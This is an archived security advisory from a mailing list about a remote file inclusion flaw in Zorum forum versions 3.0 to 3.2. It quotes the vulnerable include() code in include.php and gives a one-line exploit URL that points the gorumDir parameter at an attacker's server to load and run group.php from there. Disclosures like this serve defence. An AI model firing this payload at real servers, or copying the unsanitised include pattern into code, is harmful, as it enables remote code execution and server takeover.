('binary' encoding is not supported, stored as-is) Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file File: --------------------------------- include.php --------------------------------- PHP Code: --------------------------------- [...] include("$gorumDir/generformlib_multipleselection.php"); include("$gorumDir/generformlib_groupselection.php"); include("$gorumDir/generformlib_filebutton.php"); include("$gorumDir/group.php"); [...] --------------------------------- Exploit : --------------------------------- http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ --> include http://[attacker]/group.php on remote server --------------------------------- -- magasat_private
This archive was generated by hypermail 2b30 : Wed Jan 22 2003 - 13:30:59 PST